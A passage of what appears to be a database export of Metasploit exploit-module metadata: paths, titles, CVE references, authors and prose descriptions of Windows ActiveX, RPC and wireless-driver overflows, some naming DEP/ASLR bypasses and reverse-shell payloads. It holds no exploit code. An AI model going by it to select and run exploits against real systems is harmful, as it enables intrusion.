00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/sonicwall_addrouteentry.rb","exploit","windows/browser/sonicwall_addrouteentry","exploit/windows/browser/sonicwall_addrouteentry","SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. By sending an overly long string to the ""AddRouteEntry()"" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-11-01 00:00:00",0,,"passive","t","CVE-2007-5603, OSVDB-39069, URL-http://www.sec-consult.com/303.html","MC " 526,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb","exploit","windows/browser/symantec_altirisdeployment_downloadandinstall","exploit/windows/browser/symantec_altirisdeployment_downloadandinstall","Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",600,"This module allows remote attackers to install and execute arbitrary files on a users file system via AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.","Metasploit Framework License (BSD)","f","2009-09-09 00:00:00",0,,"passive","t","BID-36346, CVE-2009-3028, OSVDB-57893","MC " 527,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb","exploit","windows/browser/symantec_altirisdeployment_runcmd","exploit/windows/browser/symantec_altirisdeployment_runcmd","Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution. When sending an overly long string to RunCmd() method of AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-11-04 00:00:00",0,,"passive","t","BID-37092, CVE-2009-3033, OSVDB-60496","MC " 528,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_appstream_unsafe.rb","exploit","windows/browser/symantec_appstream_unsafe","exploit/windows/browser/symantec_appstream_unsafe","Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",600,"This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the ""installAppMgr()"" method. The insecure method can be exploited to download and execute arbitrary files in the context of the currently logged-on user.","Metasploit Framework License (BSD)","f","2009-01-15 00:00:00",0,,"passive","t","CVE-2008-4388, OSVDB-51410","MC " 529,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb","exploit","windows/browser/symantec_backupexec_pvcalendar","exploit/windows/browser/symantec_backupexec_pvcalendar","Symantec BackupExec Calendar Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control. By sending an overly long string to the ""_DOWText0"" property located in the pvcalendar.ocx control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-28 00:00:00",0,,"passive","t","BID-26904, CVE-2007-6016, OSVDB-42358, URL-http://secunia.com/advisories/27885/","Elazar Broad " 530,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb","exploit","windows/browser/symantec_consoleutilities_browseandsavefile","exploit/windows/browser/symantec_consoleutilities_browseandsavefile","Symantec ConsoleUtilities ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Symantecs ConsoleUtilities. By sending an overly long string to the ""BrowseAndSaveFile()"" method located in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to execute arbitrary code","Metasploit Framework License (BSD)","f","2009-11-02 00:00:00",0,,"passive","t","BID-36698, CVE-2009-3031, OSVDB-59597, URL-http://sotiriu.de/adv/NSOADV-2009-001.txt, URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00","Nikolas Sotiriu (lofi)" 531,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb","exploit","windows/browser/systemrequirementslab_unsafe","exploit/windows/browser/systemrequirementslab_unsafe","Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method",600,"This module allows attackers to execute code via an unsafe method in Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)","Metasploit Framework License (BSD)","f","2008-10-16 00:00:00",0,,"passive","t","CVE-2008-4385, OSVDB-50122, US-CERT-VU-166651","MC " 532,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/teechart_pro.rb","exploit","windows/browser/teechart_pro","exploit/windows/browser/teechart_pro","TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",300,"This module exploits a integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8 with Java support. Multiple versions (including the latest version) are affected by this vulnerability that date back to as far as 2001. The following controls are vulnerable: TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4); TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD); TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E); TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196); TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258). The controls are deployed under several SCADA based systems including: Unitronics OPC server v1.3; BACnet Operator Workstation Version 1.0.76","Metasploit Framework License (BSD)","f","2011-08-11 00:00:00",0,,"passive","t","OSVDB-74446, URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow","mr_me , sinn3r " 533,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb","exploit","windows/browser/tom_sawyer_tsgetx71ex552","exploit/windows/browser/tom_sawyer_tsgetx71ex552","Tom Sawyer Software GET Extension Factory Remote Code Execution",300,"This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect initialization under Internet Explorer. While the Tom Sawyer GET Extension Factory is installed with some versions of VMware Infrastructure Client, this module has been tested only with the versions installed with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX control tested is tsgetx71ex553.dll, version 5.5.3.238. This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The dll is installed by default with the Embarcadero software, and loaded by the targeted ActiveX.","Metasploit Framework License (BSD)","f","2011-05-03 00:00:00",0,,"passive","t","BID-48099, CVE-2011-2217, OSVDB-73211, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911","Elazar Broad, juan vazquez , rgod" 534,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/trendmicro_extsetowner.rb","exploit","windows/browser/trendmicro_extsetowner","exploit/windows/browser/trendmicro_extsetowner","Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",300,"This module exploits a remote code execution vulnerability in Trend Micro Internet Security Pro 2010 ActiveX. When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-08-25 00:00:00",0,,"passive","t","CVE-2010-3189, EDB-14878, OSVDB-67561, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-165/","Trancer " 535,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/trendmicro_officescan.rb","exploit","windows/browser/trendmicro_officescan","exploit/windows/browser/trendmicro_officescan","Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the ""CgiOnUpdate()"" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-02-12 00:00:00",0,,"passive","t","BID-22585, CVE-2007-0325, OSVDB-33040","MC " 536,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/tumbleweed_filetransfer.rb","exploit","windows/browser/tumbleweed_filetransfer","exploit/windows/browser/tumbleweed_filetransfer","Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",500,"This module exploits a stack buffer overflow in the vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed SecureTransport suite. By sending an overly long string to the TransferFile() 'remotefile' function, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-04-07 00:00:00",0,,"passive","t","CVE-2008-1724, OSVDB-44252, URL-http://www.aushack.com/200708-tumbleweed.txt","patrick " 537,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb","exploit","windows/browser/ubisoft_uplay_cmd_exec","exploit/windows/browser/ubisoft_uplay_cmd_exec","Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",300,"The uplay ActiveX component allows an attacker to execute any command line action. User must sign in, unless auto-sign in is enabled and uplay must not already be running. Due to the way the malicious executable is served (WebDAV), the module must be run on port 80, so please make sure you have enough privilege to do that. Ubisoft released patch 2.04 as of Mon 20th July.","Metasploit Framework License (BSD)","f","2012-07-29 00:00:00",0,,"passive","t","CVE-2012-4177, OSVDB-84402, URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix, URL-http://seclists.org/fulldisclosure/2012/Jul/375","Ben Campbell , Richard Hicks , Tavis Ormandy , phillips321 " 538,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb","exploit","windows/browser/ultramjcam_openfiledig_bof","exploit/windows/browser/ultramjcam_openfiledig_bof","TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",300,"This module exploits a vulnerability found in TRENDnet SecurView Internet Camera's ActiveX control. By supplying a long string of data as the sFilter argument of the OpenFileDlg() function, it is possible to trigger a buffer overflow condition due to WideCharToMultiByte (which converts unicode back to) overwriting the stack more than it should, which results arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-03-28 00:00:00",0,,"passive","t","CVE-2012-4876, EDB-18675, OSVDB-80661","rgod, sinn3r " 539,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ultraoffice_httpupload.rb","exploit","windows/browser/ultraoffice_httpupload","exploit/windows/browser/ultraoffice_httpupload","Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",400,"This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.","Metasploit Framework License (BSD)","f","2008-08-27 00:00:00",0,,"passive","t","BID-30861, CVE-2008-3878, EDB-6318, OSVDB-47866","jduck , shinnai" 540,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/verypdf_pdfview.rb","exploit","windows/browser/verypdf_pdfview","exploit/windows/browser/verypdf_pdfview","VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow",300,"The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application.","Metasploit Framework License (BSD)","f","2008-06-16 00:00:00",0,,"passive","t","BID-32313, CVE-2008-5492, OSVDB-49871","MC , dean " 541,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb","exploit","windows/browser/viscom_movieplayer_drawtext","exploit/windows/browser/viscom_movieplayer_drawtext","Viscom Software Movie Player Pro SDK ActiveX 6.8",300,"Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows remote attackers to execute arbitrary code via a long strFontName parameter to the DrawText method. The victim will first be required to trust the publisher Viscom Software. This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.","Metasploit Framework License (BSD)","f","2010-01-12 00:00:00",0,,"passive","t","CVE-2010-0356, EDB-12320, OSVDB-61634","TecR0c , mr_me , shinnai" 542,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/vlc_amv.rb","exploit","windows/browser/vlc_amv","exploit/windows/browser/vlc_amv","VLC AMV Dangling Pointer Vulnerability",400,"This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st byte in the file format (video width/height), VLC crashes due to an invalid pointer, which allows remote attackers to gain arbitrary code execution. The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also, please note that IE 8 targets require Java support in order to run properly.","Metasploit Framework License (BSD)","f","2011-03-23 00:00:00",0,,"passive","t","CVE-2010-3275, OSVDB-71277, URL-http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11, URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files","sinn3r " 543,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/vlc_mms_bof.rb","exploit","windows/browser/vlc_mms_bof","exploit/windows/browser/vlc_mms_bof","VLC MMS Stream Handling Buffer Overflow",300,"This module exploits a buffer overflow in VLC media player VLC media player prior to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result in a stack buffer overflow when handling a malicious MMS URI. This module uses the browser as attack vector. A specially crafted MMS URI is used to trigger the overflow and get flow control through SEH overwrite. Control is transferred to code located in the heap through a standard heap spray. The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.","Metasploit Framework License (BSD)","f","2012-03-15 00:00:00",0,,"passive","t","CVE-2012-1775, OSVDB-80188, URL-http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c, URL-http://www.videolan.org/security/sa1201.html","Florent Hochwelker, juan vazquez , sinn3r " 544,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/webdav_dll_hijacker.rb","exploit","windows/browser/webdav_dll_hijacker","exploit/windows/browser/webdav_dll_hijacker","WebDAV Application DLL Hijacker",0,"This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.","Metasploit Framework License (BSD)","f","2010-08-18 00:00:00",0,,"passive","t","URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html, URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt","hdm , jcran , jduck " 545,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/webex_ucf_newobject.rb","exploit","windows/browser/webex_ucf_newobject","exploit/windows/browser/webex_ucf_newobject","WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",400,"This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers. To quote iDefense's advisory, ""Before this issue was publicly reported, at least three independent security researchers had knowledge of this issue; thus, it is reasonable to believe that even more people were aware of this issue before disclosure."" NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.","Metasploit Framework License (BSD)","f","2008-08-06 00:00:00",0,,"passive","t","BID-30578, CVE-2008-3558, EDB-6220, OSVDB-47344, URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849, URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html, URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml, URL-http://www.trapkit.de/advisories/TKADV2008-009.txt","Elazar Broad, Guido Landi, Tobias Klein, jduck " 546,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/winamp_playlist_unc.rb","exploit","windows/browser/winamp_playlist_unc","exploit/windows/browser/winamp_playlist_unc","Winamp Playlist UNC Path Computer Name Overflow",500,"This module exploits a vulnerability in the Winamp media player. This flaw is triggered when a audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12.","Metasploit Framework License (BSD)","f","2006-01-29 00:00:00",0,,"passive","t","BID-16410, CVE-2006-0476, OSVDB-22789","Faithless , hdm " 547,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/winamp_ultravox.rb","exploit","windows/browser/winamp_ultravox","exploit/windows/browser/winamp_ultravox","Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",300,"This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the winamp client itself.","Metasploit Framework License (BSD)","f","2008-01-18 00:00:00",0,,"passive","t","BID-27344, CVE-2008-0065, OSVDB-41707","MC " 548,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/windvd7_applicationtype.rb","exploit","windows/browser/windvd7_applicationtype","exploit/windows/browser/windvd7_applicationtype","WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX control in InterVideo WinDVD 7. By sending a overly long string to the ""ApplicationType()"" property, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-03-20 00:00:00",0,,"passive","t","BID-23071, CVE-2007-0348, OSVDB-34315","MC " 549,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/winzip_fileview.rb","exploit","windows/browser/winzip_fileview","exploit/windows/browser/winzip_fileview","WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",300,"The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a remote attacker to execute arbitrary code on the system. The control contains several unsafe methods and is marked safe for scripting and safe for initialization. A remote attacker could exploit this vulnerability to execute arbitrary code on the victim system. WinZip 10.0 <= Build 6667 are vulnerable.","Metasploit Framework License (BSD)","f","2007-11-02 00:00:00",0,,"passive","t","BID-21060, CVE-2006-5198, OSVDB-30433","dean " 550,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/wmi_admintools.rb","exploit","windows/browser/wmi_admintools","exploit/windows/browser/wmi_admintools","Microsoft WMI Administration Tools ActiveX Buffer Overflow",500,"This module exploits a memory trust issue in the Microsoft WMI Administration tools ActiveX control. When processing a specially crafted HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods as a trusted pointer. It makes an indirect call via this pointer which leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. The WMI Adminsitrative Tools are a standalone download & install (linked in the references).","Metasploit Framework License (BSD)","f","2010-12-21 00:00:00",0,,"passive","t","BID-45546, CVE-2010-3973, OSVDB-69942, URL-http://secunia.com/advisories/42693, URL-http://wooyun.org/bug.php?action=view&id=1006, URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314, URL-http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf","MC , WooYun, jduck " 551,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/xmplay_asx.rb","exploit","windows/browser/xmplay_asx","exploit/windows/browser/xmplay_asx","XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow",400,"This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format.","Metasploit Framework License (BSD)","f","2006-11-21 00:00:00",0,,"passive","t","BID-21206, CVE-2006-6063, OSVDB-30537, URL-http://secunia.com/advisories/22999/","MC " 552,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/yahoomessenger_fvcom.rb","exploit","windows/browser/yahoomessenger_fvcom","exploit/windows/browser/yahoomessenger_fvcom","Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string to the ""fvCom()"" method from a yahoo.com domain, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-08-30 00:00:00",0,,"passive","t","BID-25494, CVE-2007-4515, OSVDB-37739, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591","MC " 553,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/yahoomessenger_server.rb","exploit","windows/browser/yahoomessenger_server","exploit/windows/browser/yahoomessenger_server","Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow",400,"This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending a overly long string to the ""Server()"" method, and then calling the ""Send()"" method, an attacker may be able to execute arbitrary code. Using the payloads ""windows/shell_bind_tcp"" and ""windows/shell_reverse_tcp"" yield for the best results.","Metasploit Framework License (BSD)","f","2007-06-05 00:00:00",0,,"passive","t","CVE-2007-3147, OSVDB-37082, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html","MC " 554,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb","exploit","windows/browser/zenturiprogramchecker_unsafe","exploit/windows/browser/zenturiprogramchecker_unsafe","Zenturi ProgramChecker ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a users file system via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.","Metasploit Framework License (BSD)","f","2007-05-29 00:00:00",0,,"passive","t","BID-24217, CVE-2007-2987, OSVDB-36715","MC " 555,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb","exploit","windows/browser/zenworks_helplauncher_exec","exploit/windows/browser/zenworks_helplauncher_exec","AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",300,"This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run arbitrary commands on the victim machine. This module has been successfully tested with the ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.","Metasploit Framework License (BSD)","f","2011-10-19 00:00:00",0,,"passive","t","BID-50274, CVE-2011-2657, OSVDB-76700, URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-318/","juan vazquez , rgod" 556,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb","exploit","windows/dcerpc/ms03_026_dcom","exploit/windows/dcerpc/ms03_026_dcom","Microsoft RPC DCOM Interface Overflow",500,"This module exploits a stack buffer overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)","Metasploit Framework License (BSD)","t","2003-07-16 00:00:00",0,,"aggressive","t","BID-8205, CVE-2003-0352, MSB-MS03-026, OSVDB-2100","cazz , hdm , spoonm " 557,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms05_017_msmq.rb","exploit","windows/dcerpc/ms05_017_msmq","exploit/windows/dcerpc/ms05_017_msmq","Microsoft Message Queueing Service Path Overflow",400,"This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. The offset to the return address changes based on the length of the system hostname, so this must be provided via the 'HNAME' option. Much thanks to snort.org and Jean-Baptiste Marchand's excellent MSRPC website.","Metasploit Framework License (BSD)","t","2005-04-12 00:00:00",0,,"aggressive","t","BID-13112, CVE-2005-0059, MSB-MS05-017, OSVDB-15458","hdm " 558,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb","exploit","windows/dcerpc/ms07_029_msdns_zonename","exploit/windows/dcerpc/ms07_029_msdns_zonename","Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",500,"This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2.","Metasploit Framework License (BSD)","t","2007-04-12 00:00:00",0,,"aggressive","t","CVE-2007-1748, MSB-MS07-029, OSVDB-34100, URL-http://www.microsoft.com/technet/security/advisory/935964.mspx","Unknown, hdm " 559,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms07_065_msmq.rb","exploit","windows/dcerpc/ms07_065_msmq","exploit/windows/dcerpc/ms07_065_msmq","Microsoft Message Queueing Service DNS Name Path Overflow",400,"This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. This name does not need to be served by a valid DNS server, only configured on the target machine.","Metasploit Framework License (BSD)","t","2007-12-11 00:00:00",0,,"aggressive","t","CVE-2007-3039, MSB-MS07-065, OSVDB-39123","hdm " 560,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/driver/broadcom_wifi_ssid.rb","exploit","windows/driver/broadcom_wifi_ssid","exploit/windows/driver/broadcom_wifi_ssid","Broadcom Wireless Driver Probe Response SSID Overflow",100,"This module exploits a stack buffer overflow in the Broadcom Wireless driver that allows remote code execution in kernel mode by sending a 802.11 probe response that contains a long SSID. The target MAC address must be provided to use this exploit. The two cards tested fell into the 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","t","2006-11-11 00:00:00",0,,"aggressive","t","CVE-2006-5882, OSVDB-30294, URL-http://projects.info-pull.com/mokb/MOKB-11-11-2006.html","Chris Eagle, Johnny Cache , hdm , skape " 561,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/driver/dlink_wifi_rates.rb","exploit","windows/driver/dlink_wifi_rates","exploit/windows/driver/dlink_wifi_rates","D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",100,"This module exploits a stack buffer overflow in the A5AGU.SYS driver provided with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains a long Rates information element. This exploit was tested with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, but D-Link does not offer an updated driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:11:95:f2:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then accessing the Windows wireless network browser and forcing it to refresh. D-Link was NOT contacted about this flaw. A search of the SecurityFocus database indicates that D-Link has not provided an official patch or solution for any of the seven flaws listed at the time of writing: (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the DWL-G132 driver (v1.21). This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","t","2006-11-13 00:00:00",0,,"aggressive","t","CVE-2006-6055, OSVDB-30296, URL-ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip, URL-http://projects.info-pull.com/mokb/MOKB-13-11-2006.html","Johnny Cache , hdm , skape " 562,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/driver/netgear_wg111_beacon.rb","exploit","windows/driver/netgear_wg111_beacon","exploit/windows/driver/netgear_wg111_beacon","NetGear WG111v2 Wireless Driver Long Beacon Overflow",100,"This module exploits a stack buffer overflow in the NetGear WG111v2 wireless device driver. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains more than 1100 bytes worth of information 